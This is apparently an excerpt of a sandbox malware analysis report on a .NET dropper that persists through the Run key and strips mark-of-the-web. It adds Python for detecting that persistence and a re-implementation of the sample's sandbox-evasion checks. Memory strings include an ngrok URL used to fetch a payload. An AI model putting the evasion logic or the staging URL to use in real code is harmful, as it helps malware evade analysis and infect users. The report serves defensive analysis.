              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_016640A3 push ebp; iretd 0_2_016640B8
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_0194637F push ebp; iretd 0_2_01946386
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_0336D4F4 push edx; iretd 0_2_0336D4F5
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_0336D4D4 push edx; iretd 0_2_0336D4D5
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05A5B49C push esp; ret 0_2_05A5B49D
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05A514F0 pushfd ; iretd 0_2_05A514F1
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF54EF push edx; iretd 0_2_05CF54F6
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF54ED push eax; iretd 0_2_05CF54EE
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF54E3 push ebx; iretd 0_2_05CF54EA
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5483 push eax; iretd 0_2_05CF548A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF54BB push eax; iretd 0_2_05CF54C2
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF544B push ebx; iretd 0_2_05CF5452
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5463 push ebx; iretd 0_2_05CF546A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF547B push ebx; iretd 0_2_05CF5482
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5428 push edx; iretd 0_2_05CF5432
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF543B push ebx; iretd 0_2_05CF54AA
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5433 push edx; iretd 0_2_05CF543A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5F97 push esi; iretd 0_2_05CF5F9E
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5F53 push esi; iretd 0_2_05CF5F62
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5F1F push esi; iretd 0_2_05CF5F2A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF5ED8 push esi; iretd 0_2_05CF5EE2
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF600B push edi; iretd 0_2_05CF601E
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF1367 push cs; iretd 0_2_05CF1376
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_05CF3301 push cs; iretd 0_2_05CF3311
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Code function: 3_2_021340A3 push ebp; iretd 3_2_021340B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Code function: 3_2_05E5637F push ebp; iretd 3_2_05E56386
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Code function: 3_2_06567735 push es; ret 3_2_06569020
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Code function: 3_2_06567735 push es; retf 5674h 3_2_0656911C
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Code function: 3_2_06567735 push es; ret 3_2_06569138
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Code function: 3_2_06563A85 push es; retn 563Bh 3_2_06564288
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Code function: 3_2_06561C76 push es; iretd 3_2_06561C7C
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | File created: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OgBoRN

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  File opened: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe:Zone.Identifier  read attributes | delete
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
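              The entries above, together with the "File created" and "Run" entries at the end of the previous section, record the dropper writing OgBoRN.exe under %APPDATA%, opening that file's Zone.Identifier stream with delete access (stripping the mark-of-the-web so the copy no longer looks downloaded) and registering the copy under the HKCU Run key. The following Python is added here as an example and is not part of the Joe Sandbox report or of the sample: it correlates those three behaviours, per process and per dropped path, over a constructed list of Sysmon-style events. The event field names, the browser noise event and the event ordering are assumptions made for the illustration.

```python
"""Correlate a dropped PE, removal of its Zone.Identifier stream and a Run-key
entry pointing at it, all performed by the same process.  Input is a constructed
list of Sysmon-like events (assumed field names: pid, image, op, target, access,
data); it is not Joe Sandbox's event format."""
import re
from collections import defaultdict

# Constructed sample, modelled on the report's observations (not a real log).
SAMPLE_EVENTS = [
    {"pid": 0, "image": r"C:\Users\user\Desktop\gq8sce-clean.com.com.exe",
     "op": "FileCreate", "target": r"C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe"},
    {"pid": 0, "image": r"C:\Users\user\Desktop\gq8sce-clean.com.com.exe",
     "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe:Zone.Identifier",
     "access": "read attributes | delete"},
    {"pid": 0, "image": r"C:\Users\user\Desktop\gq8sce-clean.com.com.exe",
     "op": "RegistryValueSet",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OgBoRN",
     "data": r"C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe"},
    # Benign noise (assumed): a browser writing a download and leaving its MOTW alone.
    {"pid": 7, "image": r"C:\Program Files\Browser\browser.exe",
     "op": "FileCreate", "target": r"C:\Users\user\Downloads\report.pdf"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
ADS_RE = re.compile(r"^(?P<file>.+?):Zone\.Identifier$", re.IGNORECASE)


def find_persistence_chains(events):
    """Return one (dropper_image, dropped_path, stages) tuple for every PE a
    process dropped and then also stripped the MOTW from and/or registered in a
    Run key.  A bare drop with no follow-up is not reported."""
    dropped = {}                  # (pid, path_lower) -> dropper image
    stages = defaultdict(set)     # (pid, path_lower) -> observed stages
    for ev in events:
        if ev["op"] == "FileCreate" and ev["target"].lower().endswith(".exe"):
            key = (ev["pid"], ev["target"].lower())
            dropped[key] = ev["image"]
            stages[key].add("dropped")
        elif ev["op"] == "FileOpen":
            m = ADS_RE.match(ev["target"])
            if m and "delete" in ev.get("access", "").lower():
                stages[(ev["pid"], m.group("file").lower())].add("motw_removed")
        elif ev["op"] == "RegistryValueSet" and RUN_KEY_RE.search(ev["target"]):
            # Run-key data is the path that will be launched; strip optional quotes.
            stages[(ev["pid"], ev.get("data", "").strip('"').lower())].add("run_key")
    findings = []
    for key, st in stages.items():
        if key in dropped and st - {"dropped"}:
            findings.append((dropped[key], key[1], sorted(st)))
    return findings


if __name__ == "__main__":
    for image, path, st in find_persistence_chains(SAMPLE_EVENTS):
        print(f"{image} -> {path}: {', '.join(st)}")
```

              Keying on (pid, path) rather than on the path alone is what separates this from a plain "Run key written" rule: an installer that legitimately writes a Run entry does not also open its own payload's Zone.Identifier stream for deletion.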
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Process information set: NOOPENFILEERRORBOX  (67 identical events)
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Process information set: NOOPENFILEERRORBOX  (133 identical events)

              Malware Analysis System Evasion

              Source: global traffic  HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive  (3 identical requests)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration  (2 identical events)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController  (2 identical events)
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B58000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: SBIEDLL.DLL
              Source: OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUN$HTTP://IP-API.COM/LINE/?FIELDS=HOSTING(SNXHK.DLL%SBIEDLL.DLL'SF2.DLL&SXIN.DLL)CMDVRT32.DLL+MANUFACTURER,MICROSOFT CORPORATION.MODEL
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: TYPE4HTTPS://KVRCMHQC.NGROK.IO//WINHOST.PIF5\WINHOST.EXE6SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN7SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUN$HTTP://IP-API.COM/LINE/?FIELDS=HOSTING(SNXHK.DLL%SBIEDLL.DLL'SF2.DLL&SXIN.DLL)CMDVRT32.DLL+MANUFACTURER,MICROSOFT CORPORATION.MODEL
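              The memory strings above are a .NET string-literal run and spell out what the sample checks before it does anything useful: the ip-api.com "hosting" flag (the "data center or colocation" signature), five sandbox and AV hook modules (SNXHK.DLL, SBIEDLL.DLL, SF2.DLL, SXIN.DLL, CMDVRT32.DLL) and the strings Manufacturer / Microsoft Corporation / Model. The Python below is an example added here, not the sample's code and not from the report, that re-implements those checks against constructed inputs so an analyst can see which values an analysis box has to present. Assumptions, labelled in the code: that the manufacturer comparison is against Win32_ComputerSystem (the report only records the NetworkAdapterConfiguration and VideoController queries), that the Model value, which is cut off in the dump, is not checked, and that the virtual-GPU name markers are a guess at what the Win32_VideoController query is used for.

```python
"""Environment checks implied by the strings recovered from OgBoRN.exe memory,
re-implemented for offline study.  Not the sample's code.  Inputs are constructed."""
from dataclasses import dataclass, field

# Recovered from the dump (see the memory strings above), compared case-insensitively.
SANDBOX_DLLS = {"snxhk.dll", "sbiedll.dll", "sf2.dll", "sxin.dll", "cmdvrt32.dll"}
# ASSUMED: what a Win32_VideoController.Name check would look for; not recovered.
VIRTUAL_GPU_MARKERS = ("vmware", "virtualbox", "vbox", "hyper-v", "qxl", "basic display")


@dataclass
class HostProfile:
    ip_api_hosting_body: str                 # raw body of GET /line/?fields=hosting
    loaded_modules: list                     # module names or full paths in the process
    cs_manufacturer: str                     # ASSUMED source: Win32_ComputerSystem.Manufacturer
    video_controllers: list = field(default_factory=list)   # Win32_VideoController.Name


def parse_ip_api_hosting(body: str) -> bool:
    """ip-api.com's /line/ format returns one value per line; with fields=hosting
    the body is the single word 'true' or 'false'."""
    return body.strip().lower() == "true"


def sandbox_dll_hits(loaded_modules):
    """Basename comparison, the way a GetModuleHandle-by-name loop behaves."""
    names = {m.replace("/", "\\").rsplit("\\", 1)[-1].lower() for m in loaded_modules}
    return sorted(names & SANDBOX_DLLS)


def evasion_reasons(profile: HostProfile):
    """Return the checks that trip on this host; an empty list means the sample
    would proceed.  Order follows the order of the strings in the dump."""
    reasons = []
    if parse_ip_api_hosting(profile.ip_api_hosting_body):
        reasons.append("ip-api hosting=true")
    hits = sandbox_dll_hits(profile.loaded_modules)
    if hits:
        reasons.append("sandbox module loaded: " + ", ".join(hits))
    if profile.cs_manufacturer.strip().lower() == "microsoft corporation":
        reasons.append("Manufacturer=Microsoft Corporation (Hyper-V guest)")
    for name in profile.video_controllers:           # ASSUMED check, see lead-in
        if any(marker in name.lower() for marker in VIRTUAL_GPU_MARKERS):
            reasons.append(f"virtual GPU: {name}")
            break
    return reasons


# Constructed profiles: a typical analysis VM versus a victim-looking workstation.
ANALYSIS_VM = HostProfile(
    ip_api_hosting_body="true\n",
    loaded_modules=[r"C:\Windows\System32\ntdll.dll",
                    r"C:\Program Files\Sandboxie\SbieDll.dll"],
    cs_manufacturer="Microsoft Corporation",
    video_controllers=["Microsoft Hyper-V Video"],
)
WORKSTATION = HostProfile(
    ip_api_hosting_body="false\n",
    loaded_modules=[r"C:\Windows\System32\ntdll.dll", r"C:\Windows\System32\kernel32.dll"],
    cs_manufacturer="Dell Inc.",
    video_controllers=["NVIDIA GeForce RTX 3060"],
)

if __name__ == "__main__":
    for label, prof in (("analysis VM", ANALYSIS_VM), ("workstation", WORKSTATION)):
        print(label, "->", evasion_reasons(prof) or "no check tripped")
```

              For detonation the practical consequence is that the ip-api.com request has to be answered with a literal "false" (or the sample's behaviour on a failed request has to be tested separately, since the report does not show that path), no Sandboxie or similar hook DLL may be mapped into the process, and a Hyper-V guest will be rejected on the manufacturer string alone.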
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Memory allocated: 1660000  memory reserve | memory write watch
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Memory allocated: 3490000  memory reserve | memory write watch
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Memory allocated: 18E0000  memory reserve | memory write watch
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Memory allocated: 5AD0000  memory reserve | memory write watch
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Memory allocated: 6AD0000  memory reserve | memory write watch
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Memory allocated: 6E00000  memory reserve | memory write watch
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe  Memory allocated: 7E00000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 2130000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 3DF0000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 5DF0000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 65B0000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 75B0000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 7B00000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 8B00000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 2410000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 3E90000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 5E90000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 66D0000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 76D0000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 7950000  memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe  Memory allocated: 8950000  memory reserve | memory write watch
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599862Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599734Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599468Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599359Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599250Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599140Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599031Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598921Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598812Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598481Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598375Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598265Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597937Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597828Jump to behavior
